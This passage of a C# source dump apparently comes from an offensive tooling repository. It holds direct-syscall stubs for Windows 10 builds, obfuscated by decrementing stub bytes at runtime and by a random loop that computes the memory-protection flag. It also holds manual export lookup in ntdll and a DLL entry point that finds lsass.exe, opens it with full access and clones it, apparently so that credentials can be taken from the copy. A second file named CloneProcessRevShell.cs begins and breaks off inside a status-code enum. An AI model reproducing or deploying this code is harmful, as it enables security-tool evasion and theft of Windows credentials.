IntPtr allocMemAddressCopy = (IntPtr)ptr; 606 | UInt32 size = (uint)syscall.Length; 607 | IntPtr sizeIntPtr = (IntPtr)size; 608 | UInt32 oldprotect = 0; 609 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo); 610 | ZwCloseX ZwCloseFunc = (ZwCloseX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCloseX)); 611 | return (NTSTATUS)ZwCloseFunc( ProcessHandle ); 612 | } 613 | 614 | } 615 | } 616 | 617 | [SuppressUnmanagedCodeSecurity] 618 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 619 | public delegate NTSTATUS ZwCreateProcessX( out IntPtr ProcessHandle, ACCESS_MASK DesiredAccess, OBJECT_ATTRIBUTES ObjectAttributes, IntPtr InheriteFromProcessHandle, bool InheritHandles, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort ); 620 | public static NTSTATUS ZwCreateProcess( out IntPtr ProcessHandle, ACCESS_MASK DesiredAccess, OBJECT_ATTRIBUTES ObjectAttributes, IntPtr InheriteFromProcessHandle, bool InheritHandles, IntPtr SectionHandle, IntPtr DebugPort, IntPtr ExceptionPort, ref OSVERSIONINFOEXW osVersionInfo ) 621 | { 622 | byte [] syscall = GetOSVersionAndReturnSyscall( 7, ref osVersionInfo ); 623 | unsafe 624 | { 625 | fixed (byte* ptr = syscall) 626 | { 627 | IntPtr allocMemAddress = (IntPtr)ptr; 628 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 629 | UInt32 size = (uint)syscall.Length; 630 | IntPtr sizeIntPtr = (IntPtr)size; 631 | UInt32 oldprotect = 0; 632 | ZwProtectVirtualMemory( new IntPtr(-1), ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo ); 633 | ZwCreateProcessX ZwCreateProcessXFunc = (ZwCreateProcessX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwCreateProcessX)); 634 | return (NTSTATUS)ZwCreateProcessXFunc( out ProcessHandle, DesiredAccess, ObjectAttributes, InheriteFromProcessHandle, InheritHandles, SectionHandle, DebugPort, ExceptionPort ); 635 | } 636 | 637 | } 638 | } 639 | 640 | [SuppressUnmanagedCodeSecurity] 641 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 642 | public delegate NTSTATUS ZwAllocateVirtualMemoryX( IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect ); 643 | public static NTSTATUS ZwAllocateVirtualMemory( IntPtr ProcessHandle, ref IntPtr BaseAddress, IntPtr ZeroBits, ref IntPtr RegionSize, UInt32 AllocationType, UInt32 Protect, ref OSVERSIONINFOEXW osVersionInfo) 644 | { 645 | byte [] syscall = GetOSVersionAndReturnSyscall( 4, ref osVersionInfo ); 646 | unsafe 647 | { 648 | fixed (byte* ptr = syscall) 649 | { 650 | IntPtr allocMemAddress = (IntPtr)ptr; 651 | IntPtr allocMemAddressCopy = (IntPtr)ptr; 652 | UInt32 size = (uint)syscall.Length; 653 | IntPtr sizeIntPtr = (IntPtr)size; 654 | UInt32 oldprotect = 0; 655 | ZwProtectVirtualMemory( ProcessHandle, ref allocMemAddress, ref sizeIntPtr, (UInt32)Zeta(), ref oldprotect, ref osVersionInfo ); 656 | ZwAllocateVirtualMemoryX ZwAllocateVirtualMemoryFunc = (ZwAllocateVirtualMemoryX)Marshal.GetDelegateForFunctionPointer(allocMemAddressCopy, typeof(ZwAllocateVirtualMemoryX)); 657 | return (NTSTATUS)ZwAllocateVirtualMemoryFunc( ProcessHandle, ref BaseAddress, ZeroBits, ref RegionSize, AllocationType, Protect ); 658 | 659 | } 660 | } 661 | } 662 | 663 | 664 | [SuppressUnmanagedCodeSecurity] 665 | [UnmanagedFunctionPointer(CallingConvention.Cdecl)] 666 | public delegate NTSTATUS RtlGetVersionX( ref OSVERSIONINFOEXW versionInfo ); 667 | public static NTSTATUS RtlGetVersion( ref OSVERSIONINFOEXW versionInfo ) 668 | { 669 | IntPtr proc = GetLibraryAddress(@"C:\Windows\System32\ntdll.dll", "RtlGetVersion", false); 670 | RtlGetVersionX RtlGetVersionFunc = (RtlGetVersionX)Marshal.GetDelegateForFunctionPointer(proc, typeof(RtlGetVersionX)); 671 | return (NTSTATUS)RtlGetVersionFunc( ref versionInfo ); 672 | } 673 | 674 | 675 | public static int Zeta() 676 | { 677 | Random number = new Random(); 678 | int code = number.Next(100); 679 | int a, b; 680 | while ( code != 32) 681 | { 682 | code = number.Next(100); 683 | } 684 | a = code; 685 | code = number.Next(100); 686 | while ( code != 32) 687 | { 688 | code = number.Next(100); 689 | } 690 | b = code; 691 | return a + b; 692 | } 693 | 694 | public static IntPtr GetExportAddress(IntPtr ModuleBase, string ExportName) 695 | { 696 | IntPtr FunctionPtr = IntPtr.Zero; 697 | Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C)); 698 | Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14)); 699 | Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18; 700 | Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader); 701 | Int64 pExport = 0; 702 | if (Magic == 0x010b) 703 | { 704 | pExport = OptHeader + 0x60; 705 | } 706 | else 707 | { 708 | pExport = OptHeader + 0x70; 709 | } 710 | Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport); 711 | Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10)); 712 | Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14)); 713 | Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18)); 714 | Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C)); 715 | Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20)); 716 | Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24)); 717 | for (int i = 0; i < NumberOfNames; i++) 718 | { 719 | string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))); 720 | if (FunctionName.Equals(ExportName, StringComparison.OrdinalIgnoreCase)) 721 | { 722 | Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase; 723 | Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase)))); 724 | FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA); 725 | break; 726 | } 727 | } 728 | return FunctionPtr; 729 | } 730 | 731 | 732 | public static IntPtr GetLibraryAddress(string DLLName, string FunctionName, bool CanLoadFromDisk = false) 733 | { 734 | IntPtr hModule = GetLoadedModuleAddress(DLLName); 735 | return GetExportAddress(hModule, FunctionName); 736 | } 737 | 738 | public static IntPtr GetLoadedModuleAddress(string DLLName) 739 | { 740 | ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules; 741 | foreach (ProcessModule Mod in ProcModules) 742 | { 743 | if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower())) 744 | { 745 | return Mod.BaseAddress; 746 | } 747 | } 748 | return IntPtr.Zero; 749 | } 750 | 751 | public static byte [] GetOSVersionAndReturnSyscall(byte sysType, ref OSVERSIONINFOEXW osVersionInfo) 752 | { 753 | var syscall = new byte [] { 074, 138, 203, 185, 001, 001, 001, 001, 016, 006, 196 }; 754 | // Client OS Windows 10 build 1803, 1809, 1903, 1909, 2004 755 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 19041)) // 2004 756 | { 757 | // ZwOpenProcess 758 | if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 759 | // ZwCreateThreadEx 760 | if (sysType == 2) { syscall[4] = 194; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 761 | // ZwWriteVirtualMemory 762 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 763 | // ZwAllocateVirtualMemory 764 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 765 | // ZwCreateSection 766 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 767 | // ZwMapViewOfSection 768 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 769 | // ZwCreateProcess 770 | if (sysType == 7) { syscall[4] = 186; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 771 | // ZwOpenThread 772 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x12E); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 773 | // ZwResumeThread 774 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 775 | // ZwWaitForSingleObject 776 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 777 | // ZwSetContextThread 778 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) {syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x18B); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 779 | // ZwGetContextThread 780 | if (sysType == 12) { syscall[4] = 243; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 781 | // ZwClose 782 | if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 783 | // ZwOpenProcessToken 784 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x128); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 785 | // ZwSuspendThread 786 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1BC); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 787 | // ZwProtectVirtualMemory 788 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 789 | // ZwCreateProcessEx 790 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 791 | // NtCreateSection 792 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 793 | // NtMapViewOfSection 794 | if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 795 | // RtlCreateUserThread 796 | if (sysType == 20) { syscall[4] = 1; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x128); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } 797 | } else 798 | 799 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 18362 || osVersionInfo.dwBuildNumber == 18363)) // 1903 1909 800 | { 801 | // NtOpenProcess 802 | if (sysType == 1) {syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 803 | // NtCreateThreadEx 804 | if (sysType == 2) { syscall[4] = 190; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 805 | // ZwWriteVirtualMemory 806 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 807 | // NtAllocateVirtualMemory 808 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 809 | // ZwCreateSection 810 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 811 | // ZwMapViewOfSection 812 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 813 | // ZwCreateProcess 814 | if (sysType == 7) { syscall[4] = 182; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 815 | // ZwOpenThread 816 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 817 | // ZwResumeThread 818 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 819 | // ZwWaitForSingleObject 820 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 821 | // ZwSetContextThread 822 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x185); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 823 | // ZwGetContextThread 824 | if (sysType == 12) { syscall[4] = 238; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 825 | // ZwClose 826 | if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 827 | // ZwOpenProcessToken 828 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x123); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 829 | // ZwSuspendThread 830 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B6); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 831 | // ZwProtectVirtualMemory 832 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 833 | // ZwCreateProcessEx 834 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 835 | // NtCreateSection 836 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 837 | // NtMapViewOfSection 838 | if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} 839 | } else 840 | 841 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 17134)) // 1803 842 | { 843 | // ZwOpenProcess 844 | if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 845 | // ZwCreateThreadEx 846 | if (sysType == 2) { syscall[4] = 188; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 847 | // ZwWriteVirtualMemory 848 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 849 | // ZwAllocateVirtualMemory 850 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 851 | // ZwCreateSection 852 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 853 | // ZwMapViewOfSection 854 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 855 | // ZwCreateProcess 856 | if (sysType == 7) { syscall[4] = 181; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 857 | // ZwOpenThread 858 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 859 | // ZwResumeThread 860 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 861 | // ZwWaitForSingleObject 862 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 863 | // ZwSetContextThread 864 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x185); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 865 | // ZwGetContextThread 866 | if (sysType == 12) { syscall[4] = 238; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 867 | // ZwClose 868 | if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 869 | // ZwOpenProcessToken 870 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x121); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 871 | // ZwSuspendThread 872 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B6); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 873 | // ZwProtectVirtualMemory 874 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 875 | // ZwCreateProcessEx 876 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 877 | // NtCreateSection 878 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 879 | // NtMapViewOfSection 880 | if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} 881 | } else 882 | 883 | if ((osVersionInfo.dwPlatformId == 2) & (osVersionInfo.dwBuildNumber == 17763)) // 1809 884 | { 885 | // ZwOpenProcess 886 | if (sysType == 1) { syscall[4] = 039; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 887 | // ZwCreateThreadEx 888 | if (sysType == 2) { syscall[4] = 189; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 889 | // ZwWriteVirtualMemory 890 | if (sysType == 3) { syscall[4] = 059; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 891 | // ZwAllocateVirtualMemory 892 | if (sysType == 4) { syscall[4] = 025; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 893 | // ZwCreateSection 894 | if (sysType == 5) { syscall[4] = 075; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 895 | // ZwMapViewOfSection 896 | if (sysType == 6) { syscall[4] = 041; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 897 | // ZwCreateProcess 898 | if (sysType == 7) { syscall[4] = 181; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 899 | // ZwOpenThread 900 | if (sysType == 8) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x129); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 901 | // ZwResumeThread 902 | if (sysType == 9) { syscall[4] = 083; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 903 | // ZwWaitForSingleObject 904 | if (sysType == 10) { syscall[4] = 005; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 905 | // ZwSetContextThread 906 | if (sysType == 11) { for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x184); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 907 | // ZwGetContextThread 908 | if (sysType == 12) { syscall[4] = 237; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 909 | // ZwClose 910 | if (sysType == 13) { syscall[4] = 016; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 911 | // ZwOpenProcessToken 912 | if (sysType == 14) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x122); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 913 | // ZwSuspendThread 914 | if (sysType == 15) { syscall[4] = 0; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; } var syscallIdentifierBytes = BitConverter.GetBytes(0x1B5); Buffer.BlockCopy(syscallIdentifierBytes, 0, syscall, 4, sizeof(uint)); } else 915 | // ZwProtectVirtualMemory 916 | if (sysType == 16) { syscall[4] = 81; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 917 | // ZwCreateProcessEx 918 | if (sysType == 17) { syscall[4] = 78; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 919 | // NtCreateSection 920 | if (sysType == 18) { syscall[4] = 75; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} else 921 | // NtMapViewOfSection 922 | if (sysType == 19) { syscall[4] = 41; for (byte i = 0; i <= 10; i++) { syscall[ i ]--; }} 923 | } // 1809 924 | 925 | return syscall; 926 | } 927 | 928 | 929 | 930 | public static int FindTheRightPID(string processName, string args1, string args2, string args3) 931 | { 932 | int result = 0; 933 | ManagementClass mClass = new ManagementClass("Win32_Process"); 934 | foreach (ManagementObject mObj in mClass.GetInstances()) 935 | { 936 | if ( mObj["Name"].Equals(processName) ) 937 | { 938 | string str1 = Convert.ToString( mObj["CommandLine"] ); 939 | if (str1.Contains(args1) & str1.Contains(args2) & str1.Contains(args3)) 940 | { 941 | result = (int)Convert.ToInt32(mObj["ProcessId"]); 942 | break; 943 | } 944 | } 945 | } 946 | return result; 947 | } 948 | 949 | public static void DllMain() // dll entrypoint 950 | { 951 | 952 | OSVERSIONINFOEXW osVersionInfo = new OSVERSIONINFOEXW { dwOSVersionInfoSize = Marshal.SizeOf(typeof(OSVERSIONINFOEXW)) }; 953 | RtlGetVersion(ref osVersionInfo); 954 | NTSTATUS status; 955 | 956 | OBJECT_ATTRIBUTES ObjAttr = new OBJECT_ATTRIBUTES 957 | { 958 | Length = (ulong)Marshal.SizeOf(typeof(OBJECT_ATTRIBUTES)), 959 | RootDirectory = IntPtr.Zero, 960 | ObjectName = IntPtr.Zero, 961 | Attributes = 0x00000040, 962 | SecurityDescriptor = IntPtr.Zero, 963 | SecurityQualityOfService = IntPtr.Zero 964 | }; 965 | 966 | // Find the running process we like to clone 967 | int ProcId = FindTheRightPID("lsass.exe", "", "", ""); 968 | 969 | Process targetProcess = Process.GetProcessById( ProcId ); 970 | CLIENT_ID clientid = new CLIENT_ID(); 971 | clientid.UniqueThread = new IntPtr(targetProcess.Threads[0].Id); 972 | clientid.UniqueProcess = new IntPtr(targetProcess.Id); 973 | IntPtr procHandle = (IntPtr)clientid.UniqueProcess; 974 | 975 | status = ZwOpenProcess(ref procHandle, ProcessAccessFlags.All, new OBJECT_ATTRIBUTES(), ref clientid, ref osVersionInfo); 976 | System.Windows.Forms.MessageBox.Show(status.ToString(), "ZwOpenProcess status"); 977 | 978 | IntPtr ProcessHandle = IntPtr.Zero; 979 | status = ZwCreateProcess( out ProcessHandle, ACCESS_MASK.GENERIC_ALL, ObjAttr, procHandle, true, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref osVersionInfo ); 980 | System.Windows.Forms.MessageBox.Show(status.ToString(), "ZwCreateProcess status"); 981 | 982 | System.Windows.Forms.MessageBox.Show("Wait - check if new lsass process is running..."); 983 | 984 | ZwClose(procHandle, ref osVersionInfo); 985 | ZwClose(ProcessHandle, ref osVersionInfo); 986 | } 987 | } 988 | } 989 | -------------------------------------------------------------------------------- /CloneProcessRevShell.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Security; 3 | using System.Diagnostics; 4 | using System.Runtime.InteropServices; 5 | using System.Runtime.ConstrainedExecution; 6 | using System.Management; 7 | using System.Security.Principal; 8 | using System.Collections.Generic; 9 | using System.ComponentModel; 10 | using System.Security.Permissions; 11 | using Microsoft.Win32.SafeHandles; 12 | using System.Linq; 13 | using System.Reflection; 14 | using System.Security.AccessControl; 15 | using System.Text; 16 | using System.Threading; 17 | using System.Security.Cryptography; 18 | using System.IO; 19 | 20 | namespace code 21 | { 22 | class Program 23 | { 24 | 25 | public enum NTSTATUS : uint 26 | { 27 | Success = 0x00000000, 28 | Wait0 = 0x00000000, 29 | Wait1 = 0x00000001, 30 | Wait2 = 0x00000002, 31 | Wait3 = 0x00000003, 32 | Wait63 = 0x0000003f, 33 | Abandoned = 0x00000080, 34 | AbandonedWait0 = 0x00000080, 35 | AbandonedWait1 = 0x00000081, 36 | AbandonedWait2 = 0x00000082, 37 | AbandonedWait3 = 0x00000083, 38 | AbandonedWait63 = 0x000000bf, 39 | UserApc = 0x000000c0, 40 | KernelApc = 0x00000100, 41 | Alerted = 0x00000101, 42 | Timeout = 0x00000102, 43 | Pending = 0x00000103, 44 | Reparse = 0x00000104, 45 | MoreEntries = 0x00000105, 46 | NotAllAssigned = 0x00000106, 47 | SomeNotMapped = 0x00000107, 48 | OpLockBreakInProgress = 0x00000108, 49 | VolumeMounted = 0x00000109, 50 | RxActCommitted = 0x0000010a, 51 | NotifyCleanup = 0x0000010b, 52 | NotifyEnumDir = 0x0000010c, 53 | NoQuotasForAccount = 0x0000010d, 54 | PrimaryTransportConnectFailed = 0x0000010e, 55 | PageFaultTransition = 0x00000110, 56 | PageFaultDemandZero = 0x00000111, 57 | PageFaultCopyOnWrite = 0x00000112, 58 | PageFaultGuardPage = 0x00000113, 59 | PageFaultPagingFile = 0x00000114, 60 | CrashDump = 0x00000116, 61 | ReparseObject = 0x00000118, 62 | NothingToTerminate = 0x00000122, 63 | ProcessNotInJob = 0x00000123, 64 | ProcessInJob = 0x00000124, 65 | ProcessCloned = 0x00000129, 66 | FileLockedWithOnlyReaders = 0x0000012a, 67 | FileLockedWithWriters = 0x0000012b, 68 | Informational = 0x40000000, 69 | ObjectNameExists = 0x40000000, 70 | ThreadWasSuspended = 0x40000001, 71 | WorkingSetLimitRange = 0x40000002, 72 | ImageNotAtBase = 0x40000003, 73 | RegistryRecovered = 0x40000009, 74 | Warning = 0x80000000, 75 | GuardPageViolation = 0x80000001, 76 | DatatypeMisalignment = 0x80000002, 77 | Breakpoint = 0x80000003, 78 | SingleStep = 0x80000004, 79 | BufferOverflow = 0x80000005, 80 | NoMoreFiles = 0x80000006, 81 | HandlesClosed = 0x8000000a, 82 | PartialCopy = 0x8000000d, 83 | DeviceBusy = 0x80000011, 84 | InvalidEaName = 0x80000013, 85 | EaListInconsistent = 0x80000014, 86 | NoMoreEntries = 0x8000001a, 87 | LongJump = 0x80000026, 88 | DllMightBeInsecure = 0x8000002b, 89 | Error = 0xc0000000, 90 | Unsuccessful = 0xc0000001, 91 | NotImplemented = 0xc0000002, 92 | InvalidInfoClass = 0xc0000003, 93 | InfoLengthMismatch = 0xc0000004, 94 | AccessViolation = 0xc0000005, 95 | InPageError = 0xc0000006, 96 | PagefileQuota = 0xc0000007, 97 | InvalidHandle = 0xc0000008, 98 | BadInitialStack = 0xc0000009, 99 | BadInitialPc = 0xc000000a, 100 | InvalidCid = 0xc000000b, 101 | TimerNotCanceled = 0xc000000c, 102 | InvalidParameter = 0xc000000d, 103 | NoSuchDevice = 0xc000000e, 104 | NoSuchFile = 0xc000000f, 105 | InvalidDeviceRequest = 0xc0000010, 106 | EndOfFile = 0xc0000011, 107 | WrongVolume = 0xc0000012, 108 | NoMediaInDevice = 0xc0000013, 109 | NoMemory = 0xc0000017, 110 | ConflictingAddresses = 0xc0000018, 111 | NotMappedView = 0xc0000019, 112 | UnableToFreeVm = 0xc000001a, 113 | UnableToDeleteSection = 0xc000001b, 114 | IllegalInstruction = 0xc000001d, 115 | AlreadyCommitted = 0xc0000021, 116 | AccessDenied = 0xc0000022, 117 | BufferTooSmall = 0xc0000023, 118 | ObjectTypeMismatch = 0xc0000024, 119 | NonContinuableException = 0xc0000025, 120 | BadStack = 0xc0000028, 121 | NotLocked = 0xc000002a, 122 | NotCommitted = 0xc000002d, 123 | InvalidParameterMix = 0xc0000030, 124 | ObjectNameInvalid = 0xc0000033, 125 | ObjectNameNotFound = 0xc0000034, 126 | ObjectNameCollision = 0xc0000035, 127 | ObjectPathInvalid = 0xc0000039, 128 | ObjectPathNotFound = 0xc000003a, 129 | ObjectPathSyntaxBad = 0xc000003b, 130 | DataOverrun = 0xc000003c, 131 | DataLate = 0xc000003d, 132 | DataError = 0xc000003e, 133 | CrcError = 0xc000003f, 134 | SectionTooBig = 0xc0000040, 135 | PortConnectionRefused = 0xc0000041, 136 | InvalidPortHandle = 0xc0000042, 137 | SharingViolation = 0xc0000043, 138 | QuotaExceeded = 0xc0000044, 139 | InvalidPageProtection = 0xc0000045, 140 | MutantNotOwned = 0xc0000046, 141 | SemaphoreLimitExceeded = 0xc0000047, 142 | PortAlreadySet = 0xc0000048, 143 | SectionNotImage = 0xc0000049, 144 | SuspendCountExceeded = 0xc000004a, 145 | 